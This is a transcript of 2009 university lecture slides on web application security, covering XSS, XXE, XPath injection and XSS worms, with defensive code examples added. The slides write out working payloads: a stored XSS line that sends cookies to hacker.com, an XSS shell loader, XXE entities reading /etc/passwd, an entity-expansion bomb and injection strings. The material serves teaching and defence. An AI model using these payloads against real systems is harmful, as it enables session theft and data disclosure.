TRANSCRIPT
Web Application Security
HSR Lectures
Ivan Bütler
May 2009
www.csnc.ch
Compass Security AG, Glärnischstrasse 7, Postfach 1628, CH-8640 Rapperswil
Tel +41 55-214 41 60, Fax +41 55-214 41 [email protected], www.csnc.ch
E1 - Who am I
- Ivan Bütler, Uznach
- Born 31.12.1970
- Founder of Compass Security AG
- Founder of Swiss Cyber Storm II
- Speaker at Blackhat 2008 Las Vegas
- Passionate security researcher
- Husband of Cornelia and father of Tim and Nick (2000/2002)
- Proud Swiss citizen
© Compass Security AG
IT Security is like kayaking
Moving across water means continuous paddling. Not moving = losing control!

In front of us ...
There are threats ahead of us.

Behind us ...
There are threats behind us.
Agenda
- OWASP Top 10
- Cross Site Scripting
- AJAX & XML Attacks
- Web 2.0 Worm
OWASP Top 10
OWASP Top 10 (Q4 2007)
- A1 Cross Site Scripting
- A2 Injection Flaws (SQLi)
- A3 Malicious File Execution (RFI)
- A4 Insecure Direct Object Reference
- A5 Cross Site Request Forgery
- A6 Information Leakage
- A7 Broken Auth & Session Management
- A8 Insecure Cryptographic Storage
- A9 Insecure Communications
- A10 Failure to Restrict URL Access
A1: Cross Site Scripting
OWASP Definition
XSS flaws occur whenever an application takes user supplied data and sends it to a web browser without first validating or encoding that content. XSS allows attackers to execute script in the victim's browser which can hijack user sessions, deface web sites, possibly introduce worms, etc.
Cross-Site Scripting, Cross-Site Tracing, Second Order Injection, HTML Injection
Attack Vector
Protocol:
1. Attracting: the victim is lured to a page so that JavaScript from www.abc.com is loaded to the client (malware).
2. Authentication into the web application.
3. Session hijacking (re-use of the client session).

JavaScript Malware
- Was previously loaded to the web application by the attacker
- Exploitation of a Cross Site Scripting vulnerability
- Is part of the "attracting" vector
- HTML formatted mail including the XSS attack vector
- Obfuscated via URL redirection including the XSS attack vector
JavaScript
- Program that is run client-side
- Usually automates client activities (clicking, etc.)
- Heavily used in Web 2.0 (Ajax)
- Is able to access the browser environment (document.cookie)
- In normal circumstances it is "good code"
- If used by hackers -> "malicious code"

JavaScript Malware
- Denial of Service attacks
- Spy on the client settings
- Background HTTP requests to foreign web sites
- Clicks through an application automatically (adds malicious payment instructions)
- API for the browser and its features
Session Stealing Sequence
Malicious JavaScript performs its own request.
Hacker -> Web Application:
POST /document.jsp?id=898&value=<script>location.href="http://hacker.com/"+document.cookie</script>
(the web application stores the value in its DB)
Client -> Web Application:
GET /app/document.jsp?id=898
Cookie: session=123
Web Application -> Client, response:
<script>location.href="http://hacker.com/"+document.cookie</script>
Client -> hacker.com:
GET /session=123
(hacker.com stores the request in its log file)
Testing
Play around with different test strings in request parameters:
- <script>alert('asdf')</script>
- <script>alert(document.cookie)</script>
- "<script>alert(document.cookie)</script>
- "><script>alert(document.cookie)</script>
- '><script>alert(document.cookie)</script>
- <img src="http://www.bla.com/image.gif" onload="alert(document.cookie)">
In the page returned:
- Search for the presence of the test strings
- Check how the characters get filtered or changed
- Find out why the XSS does not work and try new test strings
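The Python script below is an added example and not part of the original slides. It reflects a request parameter into an HTML attribute the way the vulnerable document.jsp above does, shows an output-encoded version next to it, and automates the testing steps on this slide: send the test strings, search the returned page for them, and record how each special character was filtered or changed. The page template, the parameter name value, the function names and the canary string are assumptions made for this example.

```python
# Added example (not from the original slides): a reflected parameter rendered
# without and with output encoding, plus the testing procedure from the slide
# automated. The page template, the parameter name "value" and the canary
# string are assumptions made for this example.
import html
import re

# The test strings from the slide.
XSS_PROBES = [
    "<script>alert('asdf')</script>",
    "<script>alert(document.cookie)</script>",
    '"<script>alert(document.cookie)</script>',
    '"><script>alert(document.cookie)</script>',
    "'><script>alert(document.cookie)</script>",
    '<img src="http://www.bla.com/image.gif" onload="alert(document.cookie)">',
]

# Characters that must never reach the HTML unencoded when they come from a request.
DANGEROUS = "<>\"'&"


def render_unsafe(value: str) -> str:
    """Vulnerable: the request parameter is concatenated into the page as-is,
    the same mistake as document.jsp in the session stealing sequence."""
    return f'<html><body><input name="value" value="{value}"></body></html>'


def render_safe(value: str) -> str:
    """Hardened: the value is HTML-encoded for the attribute context.
    html.escape(quote=True) turns & < > " and ' into character references."""
    encoded = html.escape(value, quote=True)
    return f'<html><body><input name="value" value="{encoded}"></body></html>'


def reflected_probes(render) -> list:
    """Step 1 from the slide: which test strings come back verbatim in the page?"""
    return [probe for probe in XSS_PROBES if probe in render(probe)]


def analyse_filtering(render, canary: str = "qz7k") -> dict:
    """Step 2 from the slide: send each dangerous character wrapped in a canary
    and report how it comes back ("verbatim", "removed", "encoded as ...", or
    "not reflected"). The canary locates the reflection inside the page, so the
    template's own < > " characters are not mistaken for reflected input."""
    report = {}
    for c in DANGEROUS:
        page = render(canary + c + canary)
        m = re.search(re.escape(canary) + "(.*?)" + re.escape(canary), page, re.S)
        if m is None:
            report[c] = "not reflected"
        elif m.group(1) == c:
            report[c] = "verbatim"
        elif m.group(1) == "":
            report[c] = "removed"
        else:
            report[c] = "encoded as " + m.group(1)
    return report


if __name__ == "__main__":
    for name, render in (("unsafe", render_unsafe), ("safe", render_safe)):
        print(name, "reflects", len(reflected_probes(render)), "of", len(XSS_PROBES), "probes")
        print(name, analyse_filtering(render))
```

The canary around each probed character is what lets the check tell reflected input apart from the template's own markup. Against a real target the page is fetched over HTTP; here render() stands in for that round trip, so the same two functions can be pointed at any request/response pair.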
IFRAME Tag
iframes
- May contain content of other web sites: <iframe src="http://www.csnc.ch/" height="300" width="300"></iframe>
Attacks
- Faked login dialogs for phishing attacks
- Retrieval of another page's content
Hacking-Lab
5030 - Cross Site Scripting Lab
Second Order Injection
Introduction
Second-Order Code Injection describes the indirect processing of injected code.
The injected code is not activated immediately by the application.
Primary targets are web applications which are fed with data from other applications.
Second-Order Code Injection is caused by missing input validation or missing output encoding.
Example (figure)
Hacking-Lab
2301 Web Security: Second Order Injection - Web Services
XSS Shell
<script src=......>
XSS Shell – Typical Procedure
Participants: attacker, XSS shell server, vulnerable server, user.
1. The attacker infects the server with a persistent XSS: <script src="http://xssshellserver/xssshell.asp"></script>
2. The user visits the server; the client receives the XSS.
3. The client requests the XSS shell code from the XSS shell server and loads it; the XSS gets persistent in the client.
4. The client polls the XSS shell server for commands.
5. The attacker sends a command to the XSS shell server.
6. The client executes the command and sends the results to the XSS shell server.
7. The client keeps polling for commands; the attacker keeps sending commands and receiving results.
Manual Proof of XSS Shell
HTTP Request to XSS vulnerable App:
GET http://www.csnc.ch/webapp/ HTTP/1.1
Host: www.csnc.ch
Cookie: CSNC=8iLksLJJpgMB4Zl7MpvjKg2ypbiFEY1wPJl8hUjoh49Z3UNFiddu7YSC4THilnP

HTTP Response from XSS vulnerable App (JavaScript loaded from the XSS shell):
HTTP/1.0 200 OK
...
<script src="http://www.google.ch/ivan.js"></script>
...

HTTP Request to XSS Shell Server:
GET http://www.google.ch/ivan.js HTTP/1.1
Host: www.google.ch

HTTP Response from XSS Shell Server:
HTTP/1.0 200 OK
alert(document.cookie);

The script from the XSS shell server runs in the origin of the vulnerable app, so the XSS shell server can access cookies from the vulnerable app.
XSS Shell (figure)
XSS Tunnel
- Used as local proxy
- Tunnels traffic over the victim connected to the xss-shell
XSS Tunnel sequence diagram
Participants: attacker, XSS Tunnel (local proxy), vulnerable application, victim, XSS-Shell.
1. Attacker posts a blog entry (containing the XSS) to the vulnerable application.
2. Victim reads the blog entry, gets the script from the XSS-Shell and begins polling commands from the XSS-Shell.
3. Attacker sends a request to the local proxy (XSS Tunnel); the XSS Tunnel sends the command to the XSS-Shell.
4. Victim polls for a command; the XSS-Shell sends the command.
5. Victim sends the request to the vulnerable application and receives the response from the application.
6. Victim returns the response to the XSS-Shell, which forwards it to the XSS Tunnel client; the XSS Tunnel shows the response to the attacker.
XSS Shell
- Tested with: Firefox, IE6 and IE7
- Works with persistent XSS or reflected (temporary) XSS
- XSS Shell communication relies on remote JavaScript loading via <script src="..."> to bypass the same-origin policy (a script loaded this way runs in the origin of the embedding page, so it can read that page's DOM and cookies even though the XSS shell server itself is a foreign origin)
- XSS Shell is Open Source
References
XSS Shell & XSS Tunnel: http://www.portcullis-security.com/
Hacking-Lab
2650 RSS Attack and XSSShell
AJAX & XML Security
AJAX Request/Response
(Diagram, source: Wikipedia)
- New engine built into newer browsers!
- Interactive GUI
- Asynchronous processing: not every action needs to be started by pressing the submit button
-  Asynchronous processing: AJAX updates the browser window (content)
XMLHttpRequest (XHR)
XMLHttpRequest is a browser API to perform background HTTP requests from JavaScript.
Introduced by Microsoft with Internet Explorer 5 (1999).
IE 5.0 / 6.0: COM/ActiveX object "Microsoft.XMLHTTP"
- ActiveX must be enabled
IE 7.0, Firefox, Opera, Safari and other browsers: native JavaScript object "XMLHttpRequest"
- ActiveX not required
- Portable

XMLHttpRequest (XHR) (figure)
Data Exchange Formats
- Upstream data format
- Downstream data format
Upstream Data Formats
Possible data formats:
- GET parameters
- POST parameters
- XML
- SOAP
Some server-side API is provided, which often maps to server-side objects and their functions.
- AJAX calls in this case are like remote method invocations
Upstream: HTTP GET Parameters
GET /dyn/req?call=foo&arg=bar HTTP/1.1
...
Upstream: HTTP POST Parameters
POST /dyn/req HTTP/1.1
Content-Type: application/x-www-form-urlencoded
...
call=foo&arg=bar
Upstream: XML
POST /dyn/req HTTP/1.1
Content-Type: text/xml
...
<?xml version="1.0" encoding="utf-8"?>
<request connectionId="cxooiqM">
  <call type="foo">
    <argument name="bar">true</argument>
  </call>
</request>
Upstream: SOAP
POST /dyn/req HTTP/1.1
Content-Type: application/soap+xml
...
<?xml version="1.0" encoding="utf-8"?>
<Envelope xmlns="http://schemas.xmlsoap.org/soap/envelope/">
  <Body>
  ...
  </Body>
</Envelope>
Downstream: XML
HTTP/1.1 200 OK
Content-Type: text/xml
...
<?xml version="1.0" encoding="utf-8"?>
<response>
  <result type="login">
    <status>false</status>
    <msg>Username or password invalid.</msg>
  </result>
</response>
Downstream: JavaScript
HTTP/1.1 200 OK
Content-Type: text/javascript
...
LibJs.user='nobody';
LibJs.groups=['member','nobody','wnc5Xh'];
$L('kYP64i').__render([$E('h1',{className:'Compiled',attributes:{},children:[$T(LibJs.Compiler.fromAscii('Hello world!'))] ...
LibJs.Server.__onComplete(1664);
Downstream: JSON
HTTP/1.1 200 OK
Content-Type: text/x-json
...
{"menu": {
  "id": "file",
  "popup": {
    "menuitem": [
      {"value": "New", "onclick": "NewDoc()"},
      {"value": "Open", "onclick": "OpenDoc()"},
      {"value": "Close", "onclick": "CloseDoc()"}
    ]}}}
Downstream: Custom
HTTP/1.1 200 OK
Content-Type: text/x-gwt
...
{OK}["53723","84268","78357","27843"]
XML Attack Vector
Attack Targets
Possible attack targets:
- network service
- XML generator
- XML parser
- application code
Conclusion
- XML core security standards are only of limited value when the XML generator or parser is the target of the attack.
- Therefore additional protection is required.
XML Parser Attacks
XML Parser Attacks
XML technology allows to offload the marshaling issues:
- No custom serialization protocols required
- Generic approach to handle different data structures
- Easy transformation of XML documents into business objects
Therefore XML parsers are very powerful:
- highly generic
- highly dynamic
This is the foundation for XML parser based attacks!
XML Parser: Verbose Error Messages
Often XML parsers return very verbose information about the problems that occurred:
- Schema definitions and the location where the parsing error occurred
- Java stack traces or parts of them
<error>
  <message>
    XMLParserError: Error on line 3: cvc-complex-type.2.4.b: The content of element 'header' is not complete. It must match '(((((((("":senderid), "":reference)), ("":receipientid){0-1}),...'.
  </message>
</error>
XML Parser: Overlong XML Documents
Although recursive entity definitions are not allowed by XML, overlong documents can still be constructed: every level doubles the previous one, so &x1; below expands to 2^99 copies of the x100 text.
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE sample [
<!ENTITY x100 "A very CPU consuming task :)">
<!ENTITY x99 "&x100;&x100;">
...
<!ENTITY x1 "&x2;&x2;">
]>
<SOAP-ENV:Envelope xmlns:SOAP-ENV=...>
<SOAP-ENV:Body>
<ns1:aaa xmlns:ns1="urn:aaa" SOAP-ENV=...>
<sample xsi:type="xsd:string">&x1;</sample>
</ns1:aaa>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
XML Parser: Overlong XML Documents
Attack on DOM parser (deep nesting):
<?xml version="1.0" encoding="UTF-8"?>
<dom-attack>
 <dom-attack>
  <dom-attack>
   <dom-attack>
    <dom-attack>
     <dom-attack>
      <dom-attack>...</dom-attack>
     </dom-attack>
    </dom-attack>
   </dom-attack>
  </dom-attack>
 </dom-attack>
</dom-attack>
XML Parser: XXE
XXE = XML External Entity attacks
Attack range:
- DoS (Denial of Service) attacks
- Inclusion of local files into XML documents
- Port scanning from the system where the XML parser is located
- Overriding the XML Schema location with a foreign location
XML Parser: XXE Denial of Service
Denial of Service
- Loading of content from local devices like /dev/zero
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE sample SYSTEM "/dev/zero">
...
XML Parser: XXE Local Connect Scan
Using external DTD references it is possible to perform TCP port scans. The verbose error message tells a closed port (connection refused) apart from an open one (the parser reads from it or hangs), which is what makes the scan work.
Request:
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE sample PUBLIC "..." "http://localhost:99">
...
Response:
<?xml version="1.0" encoding="ISO-8859-1"?>
<error>
  <type>FATAL</type>
  <message>
    XMLParserError: Error in building: Connection refused
  </message>
</error>
XML Parser: XXE DNS Resolution
Request:
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE sample PUBLIC "..." "http://www.csnc.ch:99">
...
Response:
<?xml version="1.0" encoding="ISO-8859-1"?>
<error>
  <type>FATAL</type>
  <message>
    XMLParserError: Error in building: Host not found: www.csnc.ch
  </message>
</error>
XML Parser: XXE Global Connect Scan
Request:
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE sample PUBLIC "..." "http://www.google.com">
...
Response:
<?xml version="1.0" encoding="ISO-8859-1"?>
<error>
  <type>FATAL</type>
  <message>
    XMLParserError: Error in building: Connection timeout
  </message>
</error>
XML Parser: XXE File Inclusion
DTD allows the inclusion of documents:
- XML documents, e.g. web.xml
- Any other file, e.g. /etc/passwd (difficult since XML parsers often require the content to be parseable)
Request:
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE request [
<!ENTITY include SYSTEM "/etc/passwd">
]>
<request>
<description>&include;</description>
...
</request>
XML Parser: Example
Request:
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE request [
<!ENTITY include SYSTEM "file=/etc/passwd">
]>
<request>
<description>&include;</description>
...
</request>
XML Response:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
XML Parser: External XML Schema
XML schemas can be stored remotely.
Request:
<soapenv:Envelope
  xmlns:soapenv="http://schemas.xmlsoap.org/soap..."
  xmlns:xsd="http://www.w3.org/2001/XMLSchema"
  xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
  xsi:schemaLocation="http://schemas.xmlsoap.org/so.../ http://www.hacker.com/hack.txt">
  <soapenv:Body>
  ...
  </soapenv:Body>
</soapenv:Envelope>
(A space character is required between the namespace and the schema location in xsi:schemaLocation.)
Hacking-Lab
2600 XML Attacks
Mitigation XML Attacks / Xerces Hardening
Xerces Hardening
All previous attacks are the result of weakly configured XML parsers.
To be secure against these attacks the XML parsers need to be hardened.
Hardening is a term which describes a process where a component is set up in the most minimal and secure configuration required to run the application.
The parser can be configured as follows:
SAXParser p = new SAXParser();
p.setFeature("...", true|false);
Validate schemas features:
http://xml.org/sax/features/validation -> true
http://xml.org/sax/features/namespace-prefixes -> true
http://xml.org/sax/features/namespaces -> true
http://apache.org/xml/features/validation/schema -> true
http://apache.org/xml/features/validation/schema-full-checking -> true
Xerces Hardening
Avoid external entity attacks:
http://xml.org/sax/features/external-general-entities -> false
http://xml.org/sax/features/external-parameter-entities -> false
http://apache.org/xml/features/disallow-doctype-decl -> true
(disallow-doctype-decl rejects every document carrying a DOCTYPE, which stops both XXE and entity expansion; the two external-entity features alone still leave internal entity expansion, which is what the Security Manager limits below are for.)
Avoid resolving of external XML schema locations:
p.setEntityResolver(new MyResolver());
Utilize the Security Manager to limit the number of nodes and entity expansions (the property expects a SecurityManager instance, not the class name as a string):
p.setProperty("http://apache.org/xml/properties/security-manager", new org.apache.xerces.util.SecurityManager());
Check XML against local server-side schemas and DTDs.
XPath Injection
Introduction
Just like relational databases, XML documents need to be queried for information.
To provide a standardized means for querying XML documents, XPath is used.
XPath is a basic XML technology and the foundation for other technologies like:
- XSLT
- XQuery
XPath
Let's assume the following XML document is used as a repository for user accounts and their passwords ...
<?xml version="1.0" encoding="ISO-8859-1"?>
<users>
  <user>
    <username>monsch</username>
    <password>V3riKomplikatet</password>
  </user>
  <user>
    <username>buetler</username>
    <password>$eCur1tY</password>
  </user>
</users>
XPath
... and an application using this XML document to perform authentication using XPath expressions:
//users/user[
  username/text()='monsch' and
  password/text()='V3riKomplikatet'
]
The values monsch and V3riKomplikatet are the ones embedded from the login form.
But wait?
- Doesn't this resemble SQL Injection attacks?
XPath Injection
Yes it does!
Unvalidated input parameters can lead to an XPath Injection attack.
//users/user[
  username/text()='monsch' and
  password/text()='' or '1'='1'
]
This query selects all user nodes within the XML document: in XPath, and binds tighter than or, so the predicate reads (username='monsch' and password='') or '1'='1', which is true for every user.
XPath Injection (figure): injected password value ' or '1'='1
XPath Injection
But if the application tests the number of returned results it probably won't work!
To get a more targeted attack, an educated guess can be made about the name of the username node.
This way the attack can be launched against a specific user:
//users/user[
  username/text()='monsch' and
  password/text()='' or '1'='1' and
  username/text()='monsch'
]
XPath Injection (figure): injected password value ' or '1'='1' and username/text()='monsch
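The Python script below is an added example, not part of the original slides. It takes the login lookup from the XPath slides and does it three ways: login_query_unsafe() builds the slide's expression by string concatenation and is injectable with the values shown above; login_query_safe() turns each form value into an XPath 1.0 string literal first (XPath 1.0 has no escape sequence inside a literal, so a value containing both quote kinds has to be assembled with concat()); authenticate() avoids composing a query from input at all by walking the document with ElementTree and comparing the password in constant time. The user repository is the one from the slide (plaintext passwords kept only to match it); the function names are assumptions made for this example.

```python
# Added example, not from the original slides: the login lookup from the XPath
# slides done three ways. login_query_unsafe() is the injectable string-built
# query, login_query_safe() quotes the input as an XPath 1.0 string literal, and
# authenticate() does not build a query at all. The repository is the slide's;
# the function names are assumptions for this example.
import hmac
import xml.etree.ElementTree as ET

USERS_XML = """<users>
  <user><username>monsch</username><password>V3riKomplikatet</password></user>
  <user><username>buetler</username><password>$eCur1tY</password></user>
</users>"""


def login_query_unsafe(username: str, password: str) -> str:
    """The slide's query with the form values concatenated in (vulnerable)."""
    return (f"//users/user[username/text()='{username}' and "
            f"password/text()='{password}']")


def xpath_literal(value: str) -> str:
    """Return an XPath 1.0 string literal that evaluates to exactly `value`."""
    if "'" not in value:
        return f"'{value}'"
    if '"' not in value:
        return f'"{value}"'
    # Both quote kinds present: split on single quotes and rejoin with concat(),
    # passing each single quote as a double-quoted literal.
    parts = value.split("'")
    pieces = []
    for i, part in enumerate(parts):
        if part:
            pieces.append(f"'{part}'")
        if i < len(parts) - 1:
            pieces.append('"\'"')
    return "concat(" + ", ".join(pieces) + ")"


def login_query_safe(username: str, password: str) -> str:
    """Same query, but the form values can only ever be string data."""
    return (f"//users/user[username/text()={xpath_literal(username)} and "
            f"password/text()={xpath_literal(password)}]")


def authenticate(users_xml: str, username: str, password: str) -> bool:
    """Lookup without a query string: iterate the user nodes, match the
    username by equality and compare the password in constant time."""
    root = ET.fromstring(users_xml)
    for user in root.iter("user"):
        if user.findtext("username") == username:
            stored = user.findtext("password", "")
            return hmac.compare_digest(stored.encode(), password.encode())
    return False


if __name__ == "__main__":
    payload = "' or '1'='1"
    print(login_query_unsafe("monsch", payload))   # predicate now true for every user
    print(login_query_safe("monsch", payload))     # payload is just a string literal
    print(authenticate(USERS_XML, "monsch", payload))
```

Where an XPath engine offers variable binding (XPathVariableResolver in javax.xml.xpath, for instance), binding the form values as variables is preferable even to xpath_literal(); the quoting function is for engines that only accept a finished expression string.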
AJAX Worms Analysis
Meebo Worm Movie
http://milw0rm.org/video/watch.php?id=71
What is meebo.com
Meebo is a Web 2.0 (AJAX) based instant messaging platform.
Users can chat with each other over a web client.
Meebo.com Vulnerabilities
The messaging functionality is vulnerable to Cross-Site-Scripting (XSS)
The following script is executed:
<HTML>yo<SCRIPT a=">'>">alert('XSS');</SCRIPT></HTML>
This vulnerability could be used to steal session cookies, ... (typical Web 1.0 XSS case)
It can also be used to code a worm that propagates over the messaging functionality
Impact
XSS Worm propagates without user input.
Availability of meebo.com can be affected
An attacker could gather session cookies
0-Day Exploits can be distributed by XSS-Worms
Propagation
Friendship
Propagation
Step 1: Initial message
^ A sends infected message to B
Step 2: JavaScript is executed
^ JavaScript is executed on B
^ The script looks for all buddies of B and looks for itself in the HTML document.
Step 3: JavaScript is sent to buddies of B
^ All buddies of B (including A) get the infected message
Step 4: JavaScript is executed
^ JavaScript is executed on A, C, D
^ The script looks for all buddies and sends itself to these
Step 5: ....
Analyzing the Worm Code
^ Payload, this would be the malware. Just a simple "infected by" alert box
^ Get script from window and close window. After closing window, return the script
^ Gets all buddies (gBuddyList) and sends the result from getScriptSelfAndClose to every buddy
^ First step: propagation; second step: infection
Solution
This problem is the same as in known XSS-vulnerable applications
Always perform Output Encoding.
^ < → &lt;
^ > → &gt;
^ & → &amp;
^ ...
As a second priority perform Input Filtering of dangerous characters such as: <, >, ", ', &, %
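The output encoding rule from the Solution slide, carried through on the Meebo payload quoted earlier. This is an added example, not code from the slides, from Compass Security or from Meebo; encodeForHtml, rejectDangerousInput, the render functions and the chat message are names and input constructed here.

```javascript
// Added example, not from the slides: output encoding for HTML body text,
// applied to the Meebo payload quoted on the vulnerability slide.
// All names and the sample message are constructed for this example.

// Every character with HTML meaning mapped to its entity. This is the
// "< → &lt;, > → &gt;, & → &amp;" rule from the slide, extended with both
// quote characters so the same function is also safe inside attribute values.
const HTML_ENTITIES = {
  '&': '&amp;',
  '<': '&lt;',
  '>': '&gt;',
  '"': '&quot;',
  "'": '&#39;',
};

function encodeForHtml(untrusted) {
  return String(untrusted).replace(/[&<>"']/g, ch => HTML_ENTITIES[ch]);
}

// Second-priority input filter from the slide. Rejecting (rather than stripping)
// keeps a filtered message from ever reaching the store other users read.
const DANGEROUS_INPUT = /[<>"'&%]/;
function rejectDangerousInput(message) {
  return !DANGEROUS_INPUT.test(message);
}

// Constructed message: the payload quoted on the Meebo vulnerability slide.
const MEEBO_PAYLOAD = "<HTML>yo<SCRIPT a=\">'>\">alert('XSS');</SCRIPT></HTML>";

// A chat line rendered the way a vulnerable client does it (raw concatenation
// into innerHTML) and the way a hardened client should (encode first).
function renderMessageUnsafe(from, message) {
  return '<div class="msg"><b>' + from + '</b>: ' + message + '</div>';
}
function renderMessageSafe(from, message) {
  return '<div class="msg"><b>' + encodeForHtml(from) + '</b>: ' +
         encodeForHtml(message) + '</div>';
}

// True if the rendered markup still contains a script tag the browser would parse.
function containsScriptTag(html) {
  return /<script/i.test(html);
}
```

Encoding is done at output time, in the context the data is written into (here HTML body text); the input filter is a second layer, not a replacement, because data can enter the store through other paths than the message form.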
Other popular XSS Worms
Yamanner Worm (June 2006)
^ Yahoo Webmail infected.
^ Read out users' contacts and sent itself to these
^ Sent all contacts to the author of the worm
Samy Worm (October 2005)
^ Also called the MySpace worm
^ Added the words "Samy is my hero" to the victim's profile
^ Spread by viewing the profile of a victim. If a user viewed the profile of a victim, he also became a victim
Samy Worm
In October 2005 the Samy worm took down myspace.com
MySpace is not an AJAX application
The Samy Worm parsed the data it needed from the websites.
Approximately 1'000'000 MySpace users were infected in 20 hours
"But most of all, samy is my hero" was written on every infected profile
Samy Worm
The worm performed 5 steps for every user
^ Fetch victim's profile
^ Update victim's profile
^ Confirm profile update
^ Invite samy as a friend
^ Confirm samy invitation
Problem was solved by output encoding
There are still infected profiles with the words "but most of all, samy is my hero" and the encoded JavaScript code on them.
^ Google: "but most of all, samy is my hero" site:myspace.com
Compass Security AG
Compass Security Network Computing
Postfach 1628
Glärnischstrasse 7
CH - 8640 Rapperswil
[email protected] | www.csnc.ch | +41 55 214 41 60
Secure File Exchange: www.csnc.ch/filebox
PGP-Fingerprint: